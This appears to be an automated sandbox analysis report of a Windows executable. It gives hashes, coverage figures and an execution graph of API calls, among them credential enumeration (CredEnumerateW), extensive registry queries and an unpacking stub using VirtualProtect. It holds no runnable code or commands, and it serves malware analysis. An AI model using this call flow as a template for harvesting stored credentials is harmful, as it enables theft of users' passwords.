                          Similarity
                          • API ID: wcslen$wcscat$wcscpy
                          • String ID:
                          • API String ID: 1961120804-0
                          • Opcode ID: 053325bc158fb100898e7a98b0c486d6a7ee737d4dfc05f729e58fd5416b10d2
                          • Instruction ID: 298d28553a3f700387dea6c06157f027a7ba74c69b0fe1c0d14b010c740a3b55
                          • Opcode Fuzzy Hash: 053325bc158fb100898e7a98b0c486d6a7ee737d4dfc05f729e58fd5416b10d2
                          • Instruction Fuzzy Hash: 3AE0E532000114BADF116FB2D8068CE3B99EF42364751883BFD08D2043EB3ED511869E

                          Execution Graph

                          Execution Coverage:2.4%
                          Dynamic/Decrypted Code Coverage:19.9%
                          Signature Coverage:0.5%
                          Total number of Nodes:869
                          Total number of Limit Nodes:21
                          execution_graph 34104 40fc40 70 API calls 34277 403640 21 API calls 34105 427fa4 42 API calls 34278 412e43 _endthreadex 34279 425115 76 API calls __fprintf_l 34280 43fe40 133 API calls 34108 425115 83 API calls __fprintf_l 34109 401445 memcpy memcpy DialogBoxParamA 34110 440c40 34 API calls 34112 411853 RtlInitializeCriticalSection memset 34113 401455 ExitProcess GetWindowLongA SetWindowLongA EnumChildWindows EnumChildWindows 34286 40a256 13 API calls 34288 432e5b 17 API calls 34290 43fa5a 20 API calls 34115 401060 41 API calls 34293 427260 CloseHandle memset memset 33170 410c68 FindResourceA 33171 410c81 SizeofResource 33170->33171 33174 410cae 33170->33174 33172 410c92 LoadResource 33171->33172 33171->33174 33173 410ca0 LockResource 33172->33173 33172->33174 33173->33174 34295 405e69 14 API calls 34120 433068 15 API calls __fprintf_l 34297 414a6d 18 API calls 34298 43fe6f 134 API calls 34122 424c6d 15 API calls __fprintf_l 34299 426741 19 API calls 34124 440c70 17 API calls 34125 443c71 44 API calls 34128 427c79 24 API calls 34302 416e7e memset __fprintf_l 34132 42800b 47 API calls 34133 425115 85 API calls __fprintf_l 34305 41960c 61 API calls 34134 43f40c 122 API calls __fprintf_l 34137 411814 InterlockedCompareExchange RtlDeleteCriticalSection 34138 43f81a 20 API calls 34140 414c20 memset memset 34141 410c22 memset _itoa WritePrivateProfileStringA GetPrivateProfileIntA 34309 414625 18 API calls 34310 404225 modf 34311 403a26 strlen WriteFile 34313 40422a 12 API calls 34317 427632 memset memset memcpy 34318 40ca30 59 API calls 34319 404235 26 API calls 34142 42ec34 61 API calls __fprintf_l 34143 425115 76 API calls __fprintf_l 34320 425115 77 API calls __fprintf_l 34322 44223a 38 API calls 34149 43183c 112 API calls 34323 44b2c5 _onexit __dllonexit 34328 42a6d2 memcpy __allrem 34151 405cda 65 API calls 34336 43fedc 138 API calls 34337 4116e1 16 API calls __fprintf_l 34154 4244e6 19 API calls 34156 42e8e8 127 API calls __fprintf_l 34157 4118ee RtlLeaveCriticalSection 34342 43f6ec 22 API calls 34159 425115 119 API calls __fprintf_l 33160 410cf3 EnumResourceNamesA 34345 4492f0 memcpy memcpy 34347 43fafa 18 API calls 34349 4342f9 15 API calls __fprintf_l 34160 4144fd 19 API calls 34351 4016fd NtdllDefWindowProc_A ??2@YAPAXI memset memcpy ??3@YAXPAX 34352 40b2fe LoadIconA LoadIconA SendMessageA SendMessageA SendMessageA 34355 443a84 _mbscpy 34357 43f681 17 API calls 34163 404487 22 API calls 34359 415e8c 16 API calls __fprintf_l 34167 411893 RtlDeleteCriticalSection __fprintf_l 34168 41a492 42 API calls 34363 403e96 34 API calls 34364 410e98 memset SHGetPathFromIDList SendMessageA 34170 426741 109 API calls __fprintf_l 34171 4344a2 18 API calls 34172 4094a2 10 API calls 34367 4116a6 15 API calls __fprintf_l 34368 43f6a4 17 API calls 34369 440aa3 20 API calls 34371 427430 45 API calls 34175 4090b0 7 API calls 34176 4148b0 15 API calls 34178 4118b4 RtlEnterCriticalSection 34179 4014b7 CreateWindowExA 34180 40c8b8 19 API calls 34182 4118bf RtlTryEnterCriticalSection 34376 42434a 18 API calls __fprintf_l 34378 405f53 12 API calls 34190 43f956 59 API calls 34192 40955a 17 API calls 34193 428561 36 API calls 34194 409164 7 API calls 34382 404366 19 API calls 34386 40176c ExitProcess 34389 410777 42 API calls 34199 40dd7b 51 API calls 34200 425d7c 16 API calls __fprintf_l 34391 43f6f0 25 API calls 34392 42db01 22 API calls 34201 412905 15 API calls __fprintf_l 34393 403b04 54 API calls 34394 405f04 SetDlgItemTextA GetDlgItemTextA 34395 44b301 ??3@YAXPAX 34398 4120ea 14 API calls 3 library calls 34399 40bb0a 8 API calls 34401 413f11 strcmp 34205 434110 17 API calls __fprintf_l 34208 425115 108 API calls __fprintf_l 34402 444b11 _onexit 34210 425115 76 API calls __fprintf_l 34213 429d19 10 API calls 34405 444b1f __dllonexit 34406 409f20 _strcmpi 34215 42b927 31 API calls 34409 433f26 19 API calls __fprintf_l 34410 44b323 FreeLibrary 34411 427f25 46 API calls 34412 43ff2b 17 API calls 34413 43fb30 19 API calls 34222 414d36 16 API calls 34224 40ad38 7 API calls 34415 433b38 16 API calls __fprintf_l 34095 44b33b 34096 44b344 ??3@YAXPAX 34095->34096 34097 44b34b 34095->34097 34096->34097 34098 44b354 ??3@YAXPAX 34097->34098 34099 44b35b 34097->34099 34098->34099 34100 44b364 ??3@YAXPAX 34099->34100 34101 44b36b 34099->34101 34100->34101 34102 44b374 ??3@YAXPAX 34101->34102 34103 44b37b 34101->34103 34102->34103 34228 426741 21 API calls 34229 40c5c3 125 API calls 34231 43fdc5 17 API calls 34416 4117c8 InterlockedCompareExchange RtlInitializeCriticalSection 34234 4161cb memcpy memcpy memcpy memcpy 33175 44b3cf 33176 44b3e6 33175->33176 33181 44b454 33175->33181 33176->33181 33188 44b40e GetModuleHandleA 33176->33188 33178 44b45d GetModuleHandleA 33182 44b467 33178->33182 33179 44b49a 33201 44b49f 33179->33201 33181->33178 33181->33179 33181->33182 33182->33181 33183 44b487 GetProcAddress 33182->33183 33183->33181 33184 44b405 33184->33181 33184->33182 33185 44b428 GetProcAddress 33184->33185 33185->33181 33186 44b435 VirtualProtect 33185->33186 33186->33181 33187 44b444 VirtualProtect 33186->33187 33187->33181 33189 44b417 33188->33189 33191 44b454 33188->33191 33220 44b42b GetProcAddress 33189->33220 33193 44b45d GetModuleHandleA 33191->33193 33194 44b49a 33191->33194 33200 44b467 33191->33200 33192 44b41c 33192->33191 33196 44b428 GetProcAddress 33192->33196 33193->33200 33195 44b49f 773 API calls 33194->33195 33195->33194 33196->33191 33197 44b435 VirtualProtect 33196->33197 33197->33191 33198 44b444 VirtualProtect 33197->33198 33198->33191 33199 44b487 GetProcAddress 33199->33191 33200->33191 33200->33199 33202 444c4a 33201->33202 33203 444c56 GetModuleHandleA 33202->33203 33204 444c68 __set_app_type __p__fmode __p__commode 33203->33204 33206 444cfa 33204->33206 33207 444d02 __setusermatherr 33206->33207 33208 444d0e 33206->33208 33207->33208 33229 444e22 _controlfp 33208->33229 33210 444d13 _initterm __getmainargs _initterm 33211 444d6a GetStartupInfoA 33210->33211 33213 444d9e GetModuleHandleA 33211->33213 33230 40cf44 33213->33230 33217 444dcf _cexit 33219 444e04 33217->33219 33218 444dc8 exit 33218->33217 33219->33179 33221 44b454 33220->33221 33222 44b435 VirtualProtect 33220->33222 33224 44b45d GetModuleHandleA 33221->33224 33225 44b49a 33221->33225 33222->33221 33223 44b444 VirtualProtect 33222->33223 33223->33221 33228 44b467 33224->33228 33226 44b49f 773 API calls 33225->33226 33226->33225 33227 44b487 GetProcAddress 33227->33228 33228->33221 33228->33227 33229->33210 33281 404a99 LoadLibraryA 33230->33281 33232 40cf60 33233 40cf64 33232->33233 33288 410d0e 33232->33288 33233->33217 33233->33218 33235 40cf6f 33292 40ccd7 ??2@YAPAXI 33235->33292 33237 40cf9b 33306 407cbc 33237->33306 33242 40cfc4 33324 409825 memset 33242->33324 33243 40cfd8 33329 4096f4 memset 33243->33329 33248 40d181 ??3@YAXPAX 33251 40d1b3 33248->33251 33252 40d19f DeleteObject 33248->33252 33249 407e30 _strcmpi 33250 40cfee 33249->33250 33253 40cff2 RegDeleteKeyA 33250->33253 33254 40d007 EnumResourceTypesA 33250->33254 33353 407948 ??3@YAXPAX ??3@YAXPAX 33251->33353 33252->33251 33253->33248 33257 40d047 33254->33257 33258 40d02f MessageBoxA 33254->33258 33256 40d1c4 33354 4080d4 ??3@YAXPAX 33256->33354 33260 40d0a0 CoInitialize 33257->33260 33334 40ce70 33257->33334 33258->33248 33351 40cc26 strncat memset RegisterClassA CreateWindowExA 33260->33351 33261 40d1cd 33355 407948 ??3@YAXPAX ??3@YAXPAX 33261->33355 33266 40d0b1 ShowWindow UpdateWindow LoadAcceleratorsA 33352 40c256 PostMessageA 33266->33352 33267 40d061 ??3@YAXPAX 33267->33251 33271 40d084 DeleteObject 33267->33271 33268 40d09e 33268->33260 33271->33251 33273 40d0f9 GetMessageA 33274 40d17b 33273->33274 33275 40d10d 33273->33275 33274->33248 33276 40d113 TranslateAccelerator 33275->33276 33278 40d145 IsDialogMessage 33275->33278 33279 40d139 IsDialogMessage 33275->33279 33276->33275 33277 40d16d GetMessageA 33276->33277 33277->33274 33277->33276 33278->33277 33280 40d157 TranslateMessage DispatchMessageA 33278->33280 33279->33277 33279->33278 33280->33277 33282 404ac4 GetProcAddress 33281->33282 33283 404ae8 33281->33283 33284 404add FreeLibrary 33282->33284 33285 404ad4 33282->33285 33286 404b13 33283->33286 33287 404afc MessageBoxA 33283->33287 33284->33283 33285->33284 33286->33232 33287->33232 33289 410d17 LoadLibraryA 33288->33289 33290 410d3c 33288->33290 33289->33290 33291 410d2b GetProcAddress 33289->33291 33290->33235 33291->33290 33293 40cd08 ??2@YAPAXI 33292->33293 33295 40cd26 33293->33295 33296 40cd2d 33293->33296 33363 404025 6 API calls 33295->33363 33298 40cd66 33296->33298 33299 40cd59 DeleteObject 33296->33299 33356 407088 33298->33356 33299->33298 33301 40cd6b 33359 4019b5 33301->33359 33304 4019b5 strncat 33305 40cdbf _mbscpy 33304->33305 33305->33237 33365 407948 ??3@YAXPAX ??3@YAXPAX 33306->33365 33308 407cf7 33311 407a1f malloc memcpy ??3@YAXPAX ??3@YAXPAX 33308->33311 33312 407ddc 33308->33312 33314 407d7a ??3@YAXPAX 33308->33314 33319 407e04 33308->33319 33369 40796e 7 API calls 33308->33369 33370 406f30 33308->33370 33311->33308 33312->33319 33378 407a1f 33312->33378 33314->33308 33366 407a55 33319->33366 33320 407e30 33321 407e57 33320->33321 33322 407e38 33320->33322 33321->33242 33321->33243 33322->33321 33323 407e41 _strcmpi 33322->33323 33323->33321 33323->33322 33384 4097ff 33324->33384 33326 409854 33389 409731 33326->33389 33330 4097ff 3 API calls 33329->33330 33331 409723 33330->33331 33409 40966c 33331->33409 33423 4023b2 33334->33423 33340 40ced3 33512 40cdda 7 API calls 33340->33512 33341 40cece 33344 40cf3f 33341->33344 33464 40c3d0 memset GetModuleFileNameA strrchr 33341->33464 33344->33267 33344->33268 33347 40ceed 33491 40affa 33347->33491 33351->33266 33352->33273 33353->33256 33354->33261 33355->33233 33364 406fc7 memset _mbscpy 33356->33364 33358 40709f CreateFontIndirectA 33358->33301 33360 4019e1 33359->33360 33361 4019c2 strncat 33360->33361 33362 4019e5 memset LoadIconA 33360->33362 33361->33360 33362->33304 33363->33296 33364->33358 33365->33308 33367 407a65 33366->33367 33368 407a5b ??3@YAXPAX 33366->33368 33367->33320 33368->33367 33369->33308 33371 406f37 malloc 33370->33371 33372 406f7d 33370->33372 33374 406f73 33371->33374 33375 406f58 33371->33375 33372->33308 33374->33308 33376 406f6c ??3@YAXPAX 33375->33376 33377 406f5c memcpy 33375->33377 33376->33374 33377->33376 33379 407a38 33378->33379 33380 407a2d ??3@YAXPAX 33378->33380 33381 406f30 3 API calls 33379->33381 33382 407a43 33380->33382 33381->33382 33383 40796e 7 API calls 33382->33383 33383->33319 33400 406f96 GetModuleFileNameA 33384->33400 33386 409805 strrchr 33387 409814 33386->33387 33388 409817 _mbscat 33386->33388 33387->33388 33388->33326 33401 44b090 33389->33401 33394 40930c 3 API calls 33395 409779 EnumResourceNamesA EnumResourceNamesA _mbscpy memset 33394->33395 33396 4097c5 LoadStringA 33395->33396 33397 4097db 33396->33397 33397->33396 33399 4097f3 33397->33399 33408 40937a memset GetPrivateProfileStringA WritePrivateProfileStringA _itoa 33397->33408 33399->33248 33400->33386 33402 40973e _mbscpy _mbscpy 33401->33402 33403 40930c 33402->33403 33404 44b090 33403->33404 33405 409319 memset GetPrivateProfileStringA 33404->33405 33406 409374 33405->33406 33407 409364 WritePrivateProfileStringA 33405->33407 33406->33394 33407->33406 33408->33397 33419 406f81 GetFileAttributesA 33409->33419 33411 409675 33412 40967a _mbscpy _mbscpy GetPrivateProfileIntA 33411->33412 33418 4096ee 33411->33418 33420 409278 GetPrivateProfileStringA 33412->33420 33414 4096c9 33421 409278 GetPrivateProfileStringA 33414->33421 33416 4096da 33422 409278 GetPrivateProfileStringA 33416->33422 33418->33249 33419->33411 33420->33414 33421->33416 33422->33418 33514 409c1c 33423->33514 33426 401e69 memset 33553 410dbb 33426->33553 33429 401ec2 33583 4070e3 strlen _mbscat _mbscpy _mbscat 33429->33583 33430 401ed4 33568 406f81 GetFileAttributesA 33430->33568 33433 401ee6 strlen strlen 33435 401f15 33433->33435 33436 401f28 33433->33436 33584 4070e3 strlen _mbscat _mbscpy _mbscat 33435->33584 33569 406f81 GetFileAttributesA 33436->33569 33439 401f35 33570 401c31 33439->33570 33442 401f75 33582 410a9c RegOpenKeyExA 33442->33582 33443 401c31 7 API calls 33443->33442 33445 401f91 33446 402187 33445->33446 33447 401f9c memset 33445->33447 33448 402195 ExpandEnvironmentStringsA 33446->33448 33449 4021a8 _strcmpi 33446->33449 33585 410b62 RegEnumKeyExA 33447->33585 33594 406f81 GetFileAttributesA 33448->33594 33449->33340 33449->33341 33452 40217e RegCloseKey 33452->33446 33453 401fd9 atoi 33454 401fef memset memset sprintf 33453->33454 33462 401fc9 33453->33462 33586 410b1e 33454->33586 33457 402165 33457->33452 33458 402076 memset memset strlen strlen 33458->33462 33459 4020dd strlen strlen 33459->33462 33460 4070e3 strlen _mbscat _mbscpy _mbscat 33460->33462 33461 406f81 GetFileAttributesA 33461->33462 33462->33452 33462->33453 33462->33457 33462->33458 33462->33459 33462->33460 33462->33461 33463 402167 _mbscpy 33462->33463 33593 410b62 RegEnumKeyExA 33462->33593 33463->33452 33465 40c422 33464->33465 33466 40c425 _mbscat _mbscpy _mbscpy 33464->33466 33465->33466 33467 40c49d 33466->33467 33468 40c512 33467->33468 33469 40c502 GetWindowPlacement 33467->33469 33470 40c538 33468->33470 33615 4017d2 GetSystemMetrics GetSystemMetrics SetWindowPos 33468->33615 33469->33468 33608 409b31 33470->33608 33474 40ba28 33475 40ba87 33474->33475 33479 40ba3c 33474->33479 33618 406c62 LoadCursorA SetCursor 33475->33618 33477 40ba43 _mbsicmp 33477->33479 33478 40ba8c 33619 404734 33478->33619 33627 4107f1 33478->33627 33630 404785 33478->33630 33633 403c16 33478->33633 33709 410a9c RegOpenKeyExA 33478->33709 33479->33475 33479->33477 33710 40b5e5 10 API calls 33479->33710 33480 40baa0 33481 407e30 _strcmpi 33480->33481 33482 40bab0 33481->33482 33483 40bafa SetCursor 33482->33483 33485 40baf1 qsort 33482->33485 33483->33347 33485->33483 34070 409ded SendMessageA ??2@YAPAXI ??3@YAXPAX 33491->34070 33493 40b00e 33494 40b016 33493->33494 33495 40b01f GetStdHandle 33493->33495 34071 406d1a CreateFileA 33494->34071 33496 40b01c 33495->33496 33498 40b035 33496->33498 33499 40b12d 33496->33499 34072 406c62 LoadCursorA SetCursor 33498->34072 34076 406d77 9 API calls 33499->34076 33502 40b136 33513 40c580 28 API calls 33502->33513 33503 40b087 33510 40b0a1 33503->33510 34074 40a699 12 API calls 33503->34074 33504 40b042 33504->33503 33504->33510 34073 40a57c strlen WriteFile 33504->34073 33507 40b0d6 33508 40b116 CloseHandle 33507->33508 33509 40b11f SetCursor 33507->33509 33508->33509 33509->33502 33510->33507 34075 406d77 9 API calls 33510->34075 33512->33341 33513->33344 33526 409a32 33514->33526 33517 409c80 memcpy memcpy 33518 409cda 33517->33518 33518->33517 33519 409d18 ??2@YAPAXI ??2@YAPAXI 33518->33519 33521 408db6 12 API calls 33518->33521 33520 409d54 ??2@YAPAXI 33519->33520 33524 409d8b 33519->33524 33520->33524 33521->33518 33524->33524 33536 409b9c 33524->33536 33525 4023c1 33525->33426 33527 409a44 33526->33527 33528 409a3d ??3@YAXPAX 33526->33528 33529 409a52 33527->33529 33530 409a4b ??3@YAXPAX 33527->33530 33528->33527 33531 409a63 33529->33531 33532 409a5c ??3@YAXPAX 33529->33532 33530->33529 33533 409a83 ??2@YAPAXI ??2@YAPAXI 33531->33533 33534 409a73 ??3@YAXPAX 33531->33534 33535 409a7c ??3@YAXPAX 33531->33535 33532->33531 33533->33517 33534->33535 33535->33533 33537 407a55 ??3@YAXPAX 33536->33537 33538 409ba5 33537->33538 33539 407a55 ??3@YAXPAX 33538->33539 33540 409bad 33539->33540 33541 407a55 ??3@YAXPAX 33540->33541 33542 409bb5 33541->33542 33543 407a55 ??3@YAXPAX 33542->33543 33544 409bbd 33543->33544 33545 407a1f 4 API calls 33544->33545 33546 409bd0 33545->33546 33547 407a1f 4 API calls 33546->33547 33548 409bda 33547->33548 33549 407a1f 4 API calls 33548->33549 33550 409be4 33549->33550 33551 407a1f 4 API calls 33550->33551 33552 409bee 33551->33552 33552->33525 33554 410d0e 2 API calls 33553->33554 33555 410dca 33554->33555 33556 410dfd memset 33555->33556 33595 4070ae 33555->33595 33558 410e1d 33556->33558 33598 410a9c RegOpenKeyExA 33558->33598 33561 401e9e strlen strlen 33561->33429 33561->33430 33562 410e4a 33563 410e7f _mbscpy 33562->33563 33599 410d3d _mbscpy 33562->33599 33563->33561 33565 410e5b 33600 410add RegQueryValueExA 33565->33600 33567 410e73 RegCloseKey 33567->33563 33568->33433 33569->33439 33601 410a9c RegOpenKeyExA 33570->33601 33572 401c4c 33573 401cad 33572->33573 33602 410add RegQueryValueExA 33572->33602 33573->33442 33573->33443 33575 401c6a 33576 401c71 strchr 33575->33576 33577 401ca4 RegCloseKey 33575->33577 33576->33577 33578 401c85 strchr 33576->33578 33577->33573 33578->33577 33579 401c94 33578->33579 33603 406f06 strlen 33579->33603 33581 401ca1 33581->33577 33582->33445 33583->33430 33584->33436 33585->33462 33606 410a9c RegOpenKeyExA 33586->33606 33588 410b34 33589 410b5d 33588->33589 33607 410add RegQueryValueExA 33588->33607 33589->33462 33591 410b4c RegCloseKey 33591->33589 33593->33462 33594->33449 33596 4070bd GetVersionExA 33595->33596 33597 4070ce 33595->33597 33596->33597 33597->33556 33597->33561 33598->33562 33599->33565 33600->33567 33601->33572 33602->33575 33604 406f17 33603->33604 33605 406f1a memcpy 33603->33605 33604->33605 33605->33581 33606->33588 33607->33591 33609 409b40 33608->33609 33611 409b4e 33608->33611 33616 409901 memset SendMessageA 33609->33616 33612 409b99 33611->33612 33613 409b8b 33611->33613 33612->33474 33617 409868 SendMessageA 33613->33617 33615->33470 33616->33611 33617->33612 33618->33478 33620 404785 FreeLibrary 33619->33620 33621 40473b LoadLibraryA 33620->33621 33622 40474c GetProcAddress 33621->33622 33623 40476e 33621->33623 33622->33623 33624 404764 33622->33624 33625 404781 33623->33625 33626 404785 FreeLibrary 33623->33626 33624->33623 33625->33480 33626->33625 33628 410807 33627->33628 33629 4107fc FreeLibrary 33627->33629 33628->33480 33629->33628 33631 4047a3 33630->33631 33632 404799 FreeLibrary 33630->33632 33631->33480 33632->33631 33634 4107f1 FreeLibrary 33633->33634 33635 403c30 LoadLibraryA 33634->33635 33636 403c74 33635->33636 33637 403c44 GetProcAddress 33635->33637 33639 4107f1 FreeLibrary 33636->33639 33637->33636 33638 403c5e 33637->33638 33638->33636 33642 403c6b 33638->33642 33640 403c7b 33639->33640 33641 404734 3 API calls 33640->33641 33643 403c86 33641->33643 33642->33640 33711 4036e5 33643->33711 33646 4036e5 26 API calls 33647 403c9a 33646->33647 33648 4036e5 26 API calls 33647->33648 33649 403ca4 33648->33649 33650 4036e5 26 API calls 33649->33650 33651 403cae 33650->33651 33723 4085d2 33651->33723 33659 403ce5 33660 403cf7 33659->33660 33906 402bd1 39 API calls 33659->33906 33771 410a9c RegOpenKeyExA 33660->33771 33663 403d0a 33664 403d1c 33663->33664 33907 402bd1 39 API calls 33663->33907 33772 402c5d 33664->33772 33668 4070ae GetVersionExA 33669 403d31 33668->33669 33790 410a9c RegOpenKeyExA 33669->33790 33671 403d51 33672 403d61 33671->33672 33908 402b22 46 API calls 33671->33908 33791 410a9c RegOpenKeyExA 33672->33791 33675 403d87 33676 403d97 33675->33676 33909 402b22 46 API calls 33675->33909 33792 410a9c RegOpenKeyExA 33676->33792 33679 403dbd 33680 403dcd 33679->33680 33910 402b22 46 API calls 33679->33910 33793 410808 33680->33793 33684 404785 FreeLibrary 33685 403de8 33684->33685 33797 402fdb 33685->33797 33688 402fdb 34 API calls 33689 403e00 33688->33689 33813 4032b7 33689->33813 33698 403e3b 33700 403e73 33698->33700 33701 403e46 _mbscpy 33698->33701 33860 40fb00 33700->33860 33912 40f334 334 API calls 33701->33912 33709->33480 33710->33479 33712 4036fb 33711->33712 33715 4037c5 33711->33715 33913 410863 UuidFromStringA UuidFromStringA memcpy 33712->33913 33714 40370e 33714->33715 33716 403716 strchr 33714->33716 33715->33646 33716->33715 33717 403730 33716->33717 33914 4021b6 memset 33717->33914 33719 40373f _mbscpy _mbscpy strlen 33720 4037a4 _mbscpy 33719->33720 33721 403789 sprintf 33719->33721 33915 4023e5 16 API calls 33720->33915 33721->33720 33724 4085e2 33723->33724 33916 4082cd 11 API calls 33724->33916 33728 408600 33729 403cba 33728->33729 33730 40860b memset 33728->33730 33741 40821d 33729->33741 33919 410b62 RegEnumKeyExA 33730->33919 33732 408637 33733 4086d2 RegCloseKey 33732->33733 33735 40865c memset 33732->33735 33920 410a9c RegOpenKeyExA 33732->33920 33923 410b62 RegEnumKeyExA 33732->33923 33733->33729 33921 410add RegQueryValueExA 33735->33921 33738 408694 33922 40848b 10 API calls 33738->33922 33740 4086ab RegCloseKey 33740->33732 33924 410a9c RegOpenKeyExA 33741->33924 33743 40823f 33744 403cc6 33743->33744 33745 408246 memset 33743->33745 33753 4086e0 33744->33753 33925 410b62 RegEnumKeyExA 33745->33925 33747 4082bf RegCloseKey 33747->33744 33749 40826f 33749->33747 33926 410a9c RegOpenKeyExA 33749->33926 33927 4080ed 11 API calls 33749->33927 33928 410b62 RegEnumKeyExA 33749->33928 33752 4082a2 RegCloseKey 33752->33749 33929 4045db 33753->33929 33757 40872d 33759 408737 wcslen 33757->33759 33761 4088ef 33757->33761 33759->33761 33767 40876a 33759->33767 33760 40872b CredEnumerateW 33760->33757 33937 404656 33761->33937 33762 40877a _wcsncoll 33762->33767 33764 404734 3 API calls 33764->33767 33765 404785 FreeLibrary 33765->33767 33766 408812 memset 33766->33767 33768 40883c memcpy wcschr 33766->33768 33767->33761 33767->33762 33767->33764 33767->33765 33767->33766 33767->33768 33769 4088c3 LocalFree 33767->33769 33940 40466b _mbscpy 33767->33940 33768->33767 33769->33767 33770 410a9c RegOpenKeyExA 33770->33659 33771->33663 33941 410a9c RegOpenKeyExA 33772->33941 33774 402c7a 33775 402da5 33774->33775 33776 402c87 memset 33774->33776 33775->33668 33942 410b62 RegEnumKeyExA 33776->33942 33778 402d9c RegCloseKey 33778->33775 33779 410b1e 3 API calls 33780 402ce4 memset sprintf 33779->33780 33943 410a9c RegOpenKeyExA 33780->33943 33782 402d28 33783 402d3a sprintf 33782->33783 33944 402bd1 39 API calls 33782->33944 33945 410a9c RegOpenKeyExA 33783->33945 33786 402cb2 33786->33778 33786->33779 33789 402d9a 33786->33789 33946 402bd1 39 API calls 33786->33946 33947 410b62 RegEnumKeyExA 33786->33947 33789->33778 33790->33671 33791->33675 33792->33679 33794 410816 33793->33794 33795 4107f1 FreeLibrary 33794->33795 33796 403ddd 33795->33796 33796->33684 33948 410a9c RegOpenKeyExA 33797->33948 33799 402ff9 33800 403006 memset 33799->33800 33801 40312c 33799->33801 33949 410b62 RegEnumKeyExA 33800->33949 33801->33688 33803 403033 33804 403122 RegCloseKey 33803->33804 33805 410b1e 3 API calls 33803->33805 33808 4030a2 memset 33803->33808 33810 4030f9 RegCloseKey 33803->33810 33812 410b62 RegEnumKeyExA 33803->33812 33952 402db3 26 API calls 33803->33952 33804->33801 33806 403058 memset sprintf 33805->33806 33950 410a9c RegOpenKeyExA 33806->33950 33951 410b62 RegEnumKeyExA 33808->33951 33810->33803 33812->33803 33814 4032d5 33813->33814 33815 4033a9 33813->33815 33953 4021b6 memset 33814->33953 33828 4034e4 memset memset 33815->33828 33817 4032e1 33954 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33817->33954 33819 4032ea 33820 4032f8 memset GetPrivateProfileSectionA 33819->33820 33955 4023e5 16 API calls 33819->33955 33820->33815 33825 40332f 33820->33825 33822 40339b strlen 33822->33815 33822->33825 33824 403350 strchr 33824->33825 33825->33815 33825->33822 33956 4021b6 memset 33825->33956 33957 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33825->33957 33958 4023e5 16 API calls 33825->33958 33829 410b1e 3 API calls 33828->33829 33830 40353f 33829->33830 33831 40357f 33830->33831 33832 403546 _mbscpy 33830->33832 33836 403985 33831->33836 33959 406d55 strlen _mbscat 33832->33959 33834 403565 _mbscat 33960 4033f0 19 API calls 33834->33960 33961 40466b _mbscpy 33836->33961 33840 4039aa 33842 4039ff 33840->33842 33962 40f460 memset memset 33840->33962 33983 40f6e2 33840->33983 33999 4038e8 21 API calls 33840->33999 33843 404785 FreeLibrary 33842->33843 33844 403a0b 33843->33844 33845 4037ca memset memset 33844->33845 34007 444551 memset 33845->34007 33848 4038e2 33848->33698 33911 40f334 334 API calls 33848->33911 33850 40382e 33851 406f06 2 API calls 33850->33851 33852 403843 33851->33852 33853 406f06 2 API calls 33852->33853 33854 403855 strchr 33853->33854 33855 403884 _mbscpy 33854->33855 33856 403897 strlen 33854->33856 33857 4038bf _mbscpy 33855->33857 33856->33857 33858 4038a4 sprintf 33856->33858 34019 4023e5 16 API calls 33857->34019 33858->33857 33861 44b090 33860->33861 33862 40fb10 RegOpenKeyExA 33861->33862 33863 403e7f 33862->33863 33864 40fb3b RegOpenKeyExA 33862->33864 33874 40f96c 33863->33874 33865 40fb55 RegQueryValueExA 33864->33865 33866 40fc2d RegCloseKey 33864->33866 33867 40fc23 RegCloseKey 33865->33867 33868 40fb84 33865->33868 33866->33863 33867->33866 33869 404734 3 API calls 33868->33869 33870 40fb91 33869->33870 33870->33867 33871 40fc19 LocalFree 33870->33871 33872 40fbdd memcpy memcpy 33870->33872 33871->33867 34024 40f802 11 API calls 33872->34024 33875 4070ae GetVersionExA 33874->33875 33876 40f98d 33875->33876 33877 4045db 7 API calls 33876->33877 33881 40f9a9 33877->33881 33878 40fae6 33879 404656 FreeLibrary 33878->33879 33880 403e85 33879->33880 33886 4442ea memset 33880->33886 33881->33878 33882 40fa13 memset WideCharToMultiByte 33881->33882 33882->33881 33883 40fa43 _strnicmp 33882->33883 33883->33881 33884 40fa5b WideCharToMultiByte 33883->33884 33884->33881 33885 40fa88 WideCharToMultiByte 33884->33885 33885->33881 33887 410dbb 9 API calls 33886->33887 33888 444329 33887->33888 34025 40759e strlen strlen 33888->34025 33893 410dbb 9 API calls 33894 444350 33893->33894 33895 40759e 3 API calls 33894->33895 33896 44435a 33895->33896 33897 444212 65 API calls 33896->33897 33898 444366 memset memset 33897->33898 33899 410b1e 3 API calls 33898->33899 33900 4443b9 ExpandEnvironmentStringsA strlen 33899->33900 33901 4443f4 _strcmpi 33900->33901 33902 4443e5 33900->33902 33903 403e91 33901->33903 33904 44440c 33901->33904 33902->33901 33903->33480 33905 444212 65 API calls 33904->33905 33905->33903 33906->33660 33907->33664 33908->33672 33909->33676 33910->33680 33911->33698 33912->33700 33913->33714 33914->33719 33915->33715 33917 40841c 33916->33917 33918 410a9c RegOpenKeyExA 33917->33918 33918->33728 33919->33732 33920->33732 33921->33738 33922->33740 33923->33732 33924->33743 33925->33749 33926->33749 33927->33752 33928->33749 33930 404656 FreeLibrary 33929->33930 33931 4045e3 LoadLibraryA 33930->33931 33932 404651 33931->33932 33933 4045f4 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 33931->33933 33932->33757 33932->33760 33932->33761 33934 40463d 33933->33934 33935 404643 33934->33935 33936 404656 FreeLibrary 33934->33936 33935->33932 33936->33932 33938 403cd2 33937->33938 33939 40465c FreeLibrary 33937->33939 33938->33770 33939->33938 33940->33767 33941->33774 33942->33786 33943->33782 33944->33783 33945->33786 33946->33786 33947->33786 33948->33799 33949->33803 33950->33803 33951->33803 33952->33803 33953->33817 33954->33819 33955->33820 33956->33824 33957->33825 33958->33825 33959->33834 33960->33831 33961->33840 34000 4078ba 33962->34000 33965 4078ba _mbsnbcat 33966 40f5a3 RegOpenKeyExA 33965->33966 33967 40f5c3 RegQueryValueExA 33966->33967 33968 40f6d9 33966->33968 33969 40f6d0 RegCloseKey 33967->33969 33970 40f5f0 33967->33970 33968->33840 33969->33968 33970->33969 33971 40f675 33970->33971 34004 40466b _mbscpy 33970->34004 33971->33969 34005 4012ee strlen 33971->34005 33973 40f611 33975 404734 3 API calls 33973->33975 33980 40f616 33975->33980 33976 40f69e RegQueryValueExA 33976->33969 33977 40f6c1 33976->33977 33977->33969 33978 40f66a 33979 404785 FreeLibrary 33978->33979 33979->33971 33980->33978 33981 40f661 LocalFree 33980->33981 33982 40f645 memcpy 33980->33982 33981->33978 33982->33981 